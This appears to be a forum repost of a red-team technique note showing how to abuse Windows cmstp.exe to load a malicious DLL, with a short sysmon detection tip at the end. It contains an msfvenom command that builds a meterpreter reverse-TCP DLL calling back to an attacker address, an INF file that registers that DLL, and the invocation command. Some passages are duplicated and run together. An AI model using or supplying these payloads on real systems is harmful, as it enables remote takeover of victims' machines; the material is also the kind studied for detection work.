Polaris
Member
Staff member
3
YEARS
3 YEARS OF SERVICE
Execution
Creating a file that will be loaded by CSMTP.exe binary that will in turn load our evil.dll:
Invoking the payload:
PS C:\experiments\cmstp> cmstp.exe /s .\f.inf
Observations
Rundll32 is spawned which then establishes the connection back to the attacker:
A very privitive way of hunting for suspicious instances of rundll32 initiating connections would be skimming through the sysmon logs and looking for network connections being established by rundll32 immediately/soon after it had been spawned by cmstp.
Code:
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.0.0.5 LPORT=443 -f dll > /root/tools/mitre/cmstp/evil.dllCreating a file that will be loaded by CSMTP.exe binary that will in turn load our evil.dll:
Code:
[version]
Signature=$chicago$
AdvancedINF=2.5
[DefaultInstall_SingleUser]
RegisterOCXs=RegisterOCXSection
[RegisterOCXSection]
C:\experiments\cmstp\evil.dll
[Strings]
AppAct = "SOFTWARE\Microsoft\Connection Manager"
ServiceName="mantvydas"
ShortSvcName="mantvydas"Invoking the payload:
PS C:\experiments\cmstp> cmstp.exe /s .\f.inf
Observations
Rundll32 is spawned which then establishes the connection back to the attacker:
A very privitive way of hunting for suspicious instances of rundll32 initiating connections would be skimming through the sysmon logs and looking for network connections being established by rundll32 immediately/soon after it had been spawned by cmstp.